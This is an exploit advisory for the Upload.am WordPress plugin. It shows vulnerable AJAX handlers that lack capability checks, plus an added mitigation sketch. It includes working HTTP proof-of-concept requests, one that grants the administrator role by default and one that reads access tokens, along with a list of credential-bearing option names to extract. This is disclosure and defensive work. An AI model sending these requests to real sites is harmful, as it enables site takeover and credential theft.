# Exploit Title: Upload.am 1.0.0 WordPress Plugin - Multiple Vulnerabilities
# Date: Aug 12, 2025
# Exploit Author: bRpsd cy[at]live.no
# Vendor Homepage: https://wordpress.org/plugins/upload-am-file-hosting-vpn/
# Version: <= 1.0.0
# Tested on: MacOS, localhost xampp
# Authentication required: Low privilege
Critical: Unauthorized Settings Modification (CWE-862)
CVE-ID: N/A
CVSS: 8.1 (AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H)
Affected File: upload-am-file-hosting-vpn.php:283-291
Vulnerable Code:
283: add_action('wp_ajax_upload_am_update_option', function () {
284: check_ajax_referer('upload_am_nonce', 'nonce');
285: if (!isset($_POST['option_name']) || !isset($_POST['option_value'])) {
286: wp_send_json_error(['message' => 'Missing required parameters']);
287: }
288: $option_name = sanitize_text_field(wp_unslash($_POST['option_name']));
289: $option_value = sanitize_text_field(wp_unslash($_POST['option_value']));
290: update_option($option_name, $option_value);
291: wp_send_json_success(['message' => 'Option updated']);
Input Source:
Parameter: $_POST['option_name'] and $_POST['option_value']
Flow: User input -> sanitize_text_field() -> update_option() with no capability check
Impact:
Complete WordPress configuration control allowing:
Privilege escalation (setting default_role to administrator)
Site takeover (modifying admin_email, siteurl)
Security bypass (disabling security plugins via active_plugins option)
Malicious redirections and content injection
POC:
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: target.com
Content-Type: application/x-www-form-urlencoded
Cookie: wordpress_logged_in_xxx=value
action=upload_am_update_option&option_name=default_role&option_value=administrator&nonce=VALID_NONCE_HERE
============================================================================================================
High: Sensitive Information Disclosure (CWE-200)
CVSS: 6.5 (AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N)
Affected File: upload-am-file-hosting-vpn.php:275-281
Vulnerable Code:
275: add_action('wp_ajax_upload_am_get_option', function () {
276: check_ajax_referer('upload_am_nonce', 'nonce');
277: if (!isset($_POST['option_name'])) {
278: wp_send_json_error(['message' => 'Missing option_name']);
279: }
280: $option_name = sanitize_text_field(wp_unslash($_POST['option_name']));
281: $value = get_option($option_name);
282: wp_send_json_success($value);
Input Source:
Parameter: $_POST['option_name']
Flow: User input -> sanitize_text_field() -> get_option() -> JSON response
POC:
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: target.com
Content-Type: application/x-www-form-urlencoded
Cookie: wordpress_logged_in_xxx=value
action=upload_am_get_option&option_name=upload_am_access_token&nonce=VALID_NONCE_HERE
Additional sensitive options that can be extracted:
option_name=mailserver_login
option_name=mailserver_pass
# Site configuration
option_name=admin_email
option_name=users_can_register
option_name=active_plugins
option_name=siteurl
option_name=home
# Authentication tokens
option_name=upload_am_access_token
option_name=upload_am_refresh_token
Impact:
Exposure of sensitive WordPress configuration including:
API tokens and credentials
Plugin/theme configuration
Administrative email addresses
Site URLs and security settings
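
Mitigation sketch (added example, not the plugin's or the vendor's code): both handlers routed through one gate that adds the missing capability check and restricts option names to an allow-list. The helper name upload_am_safe_option_name, the constant UPLOAD_AM_SAFE_OPTIONS, the allow-list contents and the choice of manage_options as the required capability are assumptions.

```php
<?php
// Added example, not the plugin's code. Names prefixed upload_am_safe_ are hypothetical.

// Assumption: these are the only options the plugin UI needs over AJAX.
// Both names appear in the advisory; extend with plugin-owned keys only.
const UPLOAD_AM_SAFE_OPTIONS = ['upload_am_access_token', 'upload_am_refresh_token'];

/**
 * Shared gate: nonce (CSRF), capability (authorization), allow-list (scope).
 * Returns the validated option name, or ends the request with a JSON error.
 */
function upload_am_safe_option_name(): string {
    check_ajax_referer('upload_am_nonce', 'nonce');

    // A nonce is a CSRF token, not an authorization check: any logged-in
    // user who can obtain it passes the line above.
    if (!current_user_can('manage_options')) {
        wp_send_json_error(['message' => 'Forbidden'], 403);
    }
    if (!isset($_POST['option_name'])) {
        wp_send_json_error(['message' => 'Missing option_name'], 400);
    }
    $name = sanitize_key(wp_unslash($_POST['option_name']));

    // Core options such as default_role or active_plugins never match.
    if (!in_array($name, UPLOAD_AM_SAFE_OPTIONS, true)) {
        wp_send_json_error(['message' => 'Option not allowed'], 403);
    }
    return $name;
}

add_action('wp_ajax_upload_am_get_option', function () {
    wp_send_json_success(get_option(upload_am_safe_option_name()));
});

add_action('wp_ajax_upload_am_update_option', function () {
    $name = upload_am_safe_option_name();
    if (!isset($_POST['option_value'])) {
        wp_send_json_error(['message' => 'Missing required parameters'], 400);
    }
    $value = sanitize_text_field(wp_unslash($_POST['option_value']));
    update_option($name, $value);
    wp_send_json_success(['message' => 'Option updated']);
});
```

wp_send_json_error() terminates the request, so no code after a failed check runs. sanitize_text_field() stays in place for the value, but as the Flow lines above show, sanitization alone never restricted which option was read or written.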